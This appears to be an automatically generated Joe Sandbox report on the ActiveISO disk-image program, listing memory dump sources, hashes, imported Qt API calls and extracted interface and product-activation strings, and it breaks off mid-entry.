                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$File$Array@@ByteInfo@@V0@$$V0@@$?tr@MetaObject@@String@@@$?from?get?path@?setArrayAscii_helper@Data@Dialog@@Dialog@@@@@Dir@@Edit@@Flags@LineName@NativeOption@SaveSeparators@Text@TypedV2@11V2@@Widget@@
                                                                                                                  • String ID: ISO files (*.ISO)$Save ISO Image
                                                                                                                  • API String ID: 1495069434-2521595523
                                                                                                                  • Opcode ID: b8f213b538d274c99761151589e1be4cac6d472ff8b37aa2f923315a4aa70059
                                                                                                                  • Instruction ID: ec9d4f6f7e991f397a8d6b9de4525d5fb5daa4b6656c638b8b591d58e6648826
                                                                                                                  • Opcode Fuzzy Hash: b8f213b538d274c99761151589e1be4cac6d472ff8b37aa2f923315a4aa70059
                                                                                                                  • Instruction Fuzzy Hash: 2D413272D18A07A2FB00DB64E8851AA7762FB95B45F840132E25EB2978DF3CD54DCB84
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Array$Data@@$A@$$U1@_V0@@$?allocate@?deallocate@?sharedAlloc@@AllocationData@@@@@Flags@Null@Option@
                                                                                                                  • String ID: 1loadItemToFileTreeFinished(QTreeWidgetItem*, int, int)$1setCancelVisible_waitForm(bool)$1setProgressBarProc_waitForm(int)$1setProgressBarVisible_waitForm()$1setTitles_waitForm(QString, QString)
                                                                                                                  • API String ID: 1883891627-3443375958
                                                                                                                  • Opcode ID: 825ceb58a48abe63dd7241bb44c22c105c0b7b1d665a0b2af6a67a7619bbff03
                                                                                                                  • Instruction ID: cff2fbff6c0b92c7e5b3de42e184c79976b456ad4d6579314279c3e78bdc5e93
                                                                                                                  • Opcode Fuzzy Hash: 825ceb58a48abe63dd7241bb44c22c105c0b7b1d665a0b2af6a67a7619bbff03
                                                                                                                  • Instruction Fuzzy Hash: B991F232B15A9297DB10CF15DA8657C7762FB48F84B4A8132EB4EA3B54DF38E495C304
                                                                                                                  APIs
                                                                                                                  • ??0QWidget@@QEAA@PEAV0@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C182
                                                                                                                  • ?setVisible@QWidget@@UEAAX_N@Z.QT5WIDGETS(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C1A3
                                                                                                                  • ?objectName@QObject@@QEBA?AVQString@@XZ.QT5CORE(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C1B5
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C1C6
                                                                                                                  • ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C1E0
                                                                                                                  • ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C1ED
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C1F9
                                                                                                                  • ?resize@QWidget@@QEAAXHH@Z.QT5WIDGETS(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C20B
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE ref: 00007FF65373C22F
                                                                                                                  • ?setWindowTitle@QWidget@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF65373C23C
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65373C248
                                                                                                                  • ?connectSlotsByName@QMetaObject@@SAXPEAVQObject@@@Z.QT5CORE ref: 00007FF65373C251
                                                                                                                  • ??0QTimer@@QEAA@PEAVQObject@@@Z.QT5CORE ref: 00007FF65373C276
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF65373C2B0
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF65373C2BB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Object@@String@@$Widget@@$?setMetaName@$Connection@Object@@@String@@@Type@Window$?connect?connect@?from?object?resize@?translate@Application@@ConnectionCoreFlags@ObjectQt@@@Qt@@@@@SlotsTimer@@Title@Utf8@Visible@
                                                                                                                  • String ID: 1timerUpdate()$2timeout()$wait_widget$wait_widgetClass
                                                                                                                  • API String ID: 928983303-193491658
                                                                                                                  • Opcode ID: 37f2865f4c54e7949a777e0e6db805335448f4d0f66c50f5545754d54ff8df85
                                                                                                                  • Instruction ID: 26875f943444d3a2cb1e427ac2bb1884f20f14acef763d5374d7f65fb0545c2a
                                                                                                                  • Opcode Fuzzy Hash: 37f2865f4c54e7949a777e0e6db805335448f4d0f66c50f5545754d54ff8df85
                                                                                                                  • Instruction Fuzzy Hash: AE418C71A28B4296EB009B51E985279B362FB89F95F480031DA4EB3B74DF3CD159C788
                                                                                                                  APIs
                                                                                                                  • ?childCount@QTreeWidgetItem@@QEBAHXZ.QT5WIDGETS ref: 00007FF6537208CB
                                                                                                                  • ?child@QTreeWidgetItem@@QEBAPEAV1@H@Z.QT5WIDGETS ref: 00007FF6537208F0
                                                                                                                    • Part of subcall function 00007FF653720790: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537207B4
                                                                                                                    • Part of subcall function 00007FF653720790: ?text@QTreeWidgetItem@@QEBA?AVQString@@H@Z.QT5WIDGETS ref: 00007FF6537207DB
                                                                                                                    • Part of subcall function 00007FF653720790: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF6537207EA
                                                                                                                    • Part of subcall function 00007FF653720790: ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF653720809
                                                                                                                    • Part of subcall function 00007FF653720790: ?append@QString@@QEAAAEAV1@AEBV1@@Z.QT5CORE ref: 00007FF653720818
                                                                                                                    • Part of subcall function 00007FF653720790: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653720824
                                                                                                                    • Part of subcall function 00007FF653720790: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653720835
                                                                                                                    • Part of subcall function 00007FF653720790: ?append@QString@@QEAAAEAV1@AEBV1@@Z.QT5CORE ref: 00007FF65372084A
                                                                                                                    • Part of subcall function 00007FF653720790: ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FF653720858
                                                                                                                    • Part of subcall function 00007FF653720790: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653720866
                                                                                                                    • Part of subcall function 00007FF653720790: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653720878
                                                                                                                    • Part of subcall function 00007FF653720790: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653720884
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653720913
                                                                                                                  • ?split@QString@@QEBA?AVQStringList@@AEBV1@W4SplitBehavior@1@W4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FF65372093B
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653720947
                                                                                                                  • ?size@QListData@@QEBAHXZ.QT5CORE ref: 00007FF653720955
                                                                                                                  • ?size@QListData@@QEBAHXZ.QT5CORE ref: 00007FF65372096B
                                                                                                                    • Part of subcall function 00007FF65371FE20: ?size@QListData@@QEBAHXZ.QT5CORE ref: 00007FF65371FE3B
                                                                                                                    • Part of subcall function 00007FF65371FE20: ?at@QListData@@QEBAPEAPEAXH@Z.QT5CORE ref: 00007FF65371FE62
                                                                                                                    • Part of subcall function 00007FF65371FE20: ?size@QListData@@QEBAHXZ.QT5CORE ref: 00007FF65371FE72
                                                                                                                  • ?child@QTreeWidgetItem@@QEBAPEAV1@H@Z.QT5WIDGETS ref: 00007FF65372097C
                                                                                                                  • ?text@QTreeWidgetItem@@QEBA?AVQString@@H@Z.QT5WIDGETS ref: 00007FF653720990
                                                                                                                  • ?toLong@QString@@QEBAJPEA_NH@Z.QT5CORE ref: 00007FF6537209A0
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537209AD
                                                                                                                  • ?child@QTreeWidgetItem@@QEBAPEAV1@H@Z.QT5WIDGETS ref: 00007FF6537209B8
                                                                                                                  • ?child@QTreeWidgetItem@@QEBAPEAV1@H@Z.QT5WIDGETS ref: 00007FF6537209DE
                                                                                                                  • ?child@QTreeWidgetItem@@QEBAPEAV1@H@Z.QT5WIDGETS ref: 00007FF6537209FC
                                                                                                                  • ?text@QTreeWidgetItem@@QEBA?AVQString@@H@Z.QT5WIDGETS ref: 00007FF653720A10
                                                                                                                  • ?toLongLong@QString@@QEBA_JPEA_NH@Z.QT5CORE ref: 00007FF653720A20
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653720A32
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653720A97
                                                                                                                  • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FF653720AA5
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653720AB1
                                                                                                                  • ?childCount@QTreeWidgetItem@@QEBAHXZ.QT5WIDGETS ref: 00007FF653720ABC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Item@@TreeWidget$Data@@List$?child@$?size@$?from?text@V0@@$?append@?childArrayArray@@Ascii_helper@ByteCount@Data@Long@TypedV1@@$?at@?dispose@?split@Behavior@1@CaseData@1@@List@@LongQt@@@Sensitivity@SplitStringUtf8@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 343962909-0
                                                                                                                  • Opcode ID: f2999f01b36d953518e78b602c316a4f64e16ca3c9fc759e1f8c8a5f96d3684a
                                                                                                                  • Instruction ID: cc8ca955fd647eae13bbdfa2e04d2069dc509c3e801c9f262e24d876bdb7d849
                                                                                                                  • Opcode Fuzzy Hash: f2999f01b36d953518e78b602c316a4f64e16ca3c9fc759e1f8c8a5f96d3684a
                                                                                                                  • Instruction Fuzzy Hash: 1451C032F28A4286EA109B21E8462B96763FF85F91F884031E94FF3664DF3CD449C784
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • <a href='%2'>www.lsoft.net/act</a>, xrefs: 00007FF65375758B
                                                                                                                  • You have no network access. Auto-activation is not possible. Save and email us activation request file or upload it on another PC to %1 Then download and insert activation response above and click Next button., xrefs: 00007FF6537575A7
                                                                                                                  • https://www.lsoft.net/act/, xrefs: 00007FF653757574
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?fromArrayAscii_helper@Char@@@Data@Typed$Plain$?arg@?setChar@@Edit@@Latin1String@@@TextText@$?select?tr@All@Label@@MetaObject@@Settings@@
                                                                                                                  • String ID: <a href='%2'>www.lsoft.net/act</a>$You have no network access. Auto-activation is not possible. Save and email us activation request file or upload it on another PC to %1 Then download and insert activation response above and click Next button.$https://www.lsoft.net/act/
                                                                                                                  • API String ID: 2013337409-27557791
                                                                                                                  • Opcode ID: 42c109f7c31fa3b8e27f8b418326943d63d7b7dbc1c3ae0e68e9efcbe7fe62ba
                                                                                                                  • Instruction ID: ed47206571c67afbd495c654485bc9f02fc0e580f7aaec8ab0d54bd45ba2f26e
                                                                                                                  • Opcode Fuzzy Hash: 42c109f7c31fa3b8e27f8b418326943d63d7b7dbc1c3ae0e68e9efcbe7fe62ba
                                                                                                                  • Instruction Fuzzy Hash: 0F41B332A28A82D3E700DB64E8922A97362FB85F90F445131D65EA3BB4DF3CD448C744
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Settings@@$?from?setVariant@@$?append@?clear@?count@ArrayArray@@Ascii_helper@ByteCodec@Data@Format@0@Object@@@String@@@TypedUtf8@V0@@V1@@Value@Variant@@@Widget@@
                                                                                                                  • String ID: UTF-8$lastOpenedPath$setts.ini
                                                                                                                  • API String ID: 904552838-1812604649
                                                                                                                  • Opcode ID: 3c5074afaf5f5a37ab3efb75070bd16821ad7a5b20a5fc174e91cfecf3b22146
                                                                                                                  • Instruction ID: 659240c009a4b99e3b03580ecb98531dc15dcf1667c6a66feb3c0bd7c3a9a927
                                                                                                                  • Opcode Fuzzy Hash: 3c5074afaf5f5a37ab3efb75070bd16821ad7a5b20a5fc174e91cfecf3b22146
                                                                                                                  • Instruction Fuzzy Hash: F0413232E28A8792EB10CB60F8861A96772FB95F54F480031D64EB6964DF7CD549C784
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: WizardWizard@@$?wizard@Object@@Page@@$?set$Meta$Connection@Option@Option@1@_String@@$?connect@?disconnect@?tr@ButtonButton@1@ConnectionD01@Qt@@@String@@@Text@Type@Visible@Widget@@
                                                                                                                  • String ID: &Print$1printButtonClicked()$1printButtonClicked()$2customButtonClicked(int)$2customButtonClicked(int)
                                                                                                                  • API String ID: 3140675397-2387116427
                                                                                                                  • Opcode ID: 7612ee3037238554e2042632aa84292c56cf77be1119ee493b7f03a4230dfc50
                                                                                                                  • Instruction ID: f0e15493063456054bbd2871f0993638b7eec11518f185dee7b4a2fe2cf5e666
                                                                                                                  • Opcode Fuzzy Hash: 7612ee3037238554e2042632aa84292c56cf77be1119ee493b7f03a4230dfc50
                                                                                                                  • Instruction Fuzzy Hash: D5219161E28B4282EA509B61F8553B92363FF85FA1F490234D85EB3BA4DF3CD008C744
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF653742A00: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742A5A
                                                                                                                    • Part of subcall function 00007FF653742A00: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742A65
                                                                                                                    • Part of subcall function 00007FF653742A00: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742A7C
                                                                                                                    • Part of subcall function 00007FF653742A00: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742AA0
                                                                                                                    • Part of subcall function 00007FF653742A00: ?currentDate@QDate@@SA?AV1@XZ.QT5CORE ref: 00007FF653742AAE
                                                                                                                    • Part of subcall function 00007FF653742A00: ?toString@QDate@@QEBA?AVQString@@AEBV2@@Z.QT5CORE ref: 00007FF653742ABF
                                                                                                                    • Part of subcall function 00007FF653742A00: ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF653742ACD
                                                                                                                    • Part of subcall function 00007FF653742A00: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742AE0
                                                                                                                    • Part of subcall function 00007FF653742A00: ?setValue@QSettings@@QEAAXAEBVQString@@AEBVQVariant@@@Z.QT5CORE ref: 00007FF653742AF6
                                                                                                                    • Part of subcall function 00007FF653742A00: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742B01
                                                                                                                    • Part of subcall function 00007FF653742A00: ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF653742B0C
                                                                                                                    • Part of subcall function 00007FF653742A00: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742B17
                                                                                                                    • Part of subcall function 00007FF653742A00: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742B22
                                                                                                                    • Part of subcall function 00007FF653742A00: ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF653742B2D
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653757995
                                                                                                                  • ?text@QLineEdit@@QEBA?AVQString@@XZ.QT5WIDGETS ref: 00007FF6537579AC
                                                                                                                    • Part of subcall function 00007FF653757B80: ?tr@QMetaObject@@QEBA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF653757BA6
                                                                                                                  • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF6537579DA
                                                                                                                  • ?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z.QT5CORE ref: 00007FF6537579F7
                                                                                                                  • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF653757A0A
                                                                                                                  • ?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z.QT5CORE ref: 00007FF653757A2B
                                                                                                                  • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF653757A3E
                                                                                                                  • ?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z.QT5CORE ref: 00007FF653757A5A
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF653757A85
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653757A91
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653757A9D
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653757AA9
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653757AB5
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653757AC1
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653757AD0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Char@@@$?fromArrayAscii_helper@Data@Typed$?arg@Char@@Latin1$?setDate@@Settings@@String@@@Variant@@$?current?text@?tr@Date@Edit@@Label@@LineMetaObject@@String@Text@V2@@Value@Variant@@@
                                                                                                                  • String ID: &trade;$<i>%1</i>%2 has been successfully activated on the name: <b>%3</b>
                                                                                                                  • API String ID: 1329421334-4289461772
                                                                                                                  • Opcode ID: 509aeaba7cf8e986791f6b715c1b3992840be71d2ca16d5bb6f149d0de3bfbcc
                                                                                                                  • Instruction ID: a8c7042504bdd5cf2ea91b151817ef8b43061e3ec43ba837c4cf4c40e171afcd
                                                                                                                  • Opcode Fuzzy Hash: 509aeaba7cf8e986791f6b715c1b3992840be71d2ca16d5bb6f149d0de3bfbcc
                                                                                                                  • Instruction Fuzzy Hash: 8F418722A28A82D2E750DB60E8922AD7321FBC9F91F455131DA5FA3B64DF3CD54CC744
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Object@@$Network$Connection@MetaString@@$?connect@Char@@@ConnectionQt@@@Request@@Type@Url@@$?arg@?get@AccessChar@@Latin1Manager@@Mode@0@@ParsingReply@@Request@@@Url@@@V0@@
                                                                                                                  • String ID: 1replyFinished(QNetworkReply*)$1slotReadyRead()$2finished(QNetworkReply*)$2readyRead()
                                                                                                                  • API String ID: 3786380096-3034305407
                                                                                                                  • Opcode ID: 6f31604fc06c36bb1e4a2c29a706494abda3fde9def4f799e47a6b3cc5d1079f
                                                                                                                  • Instruction ID: 672d16ebf0d615ef7dc65959d1131667dd2ef674a591c445f4063611fe09eaf2
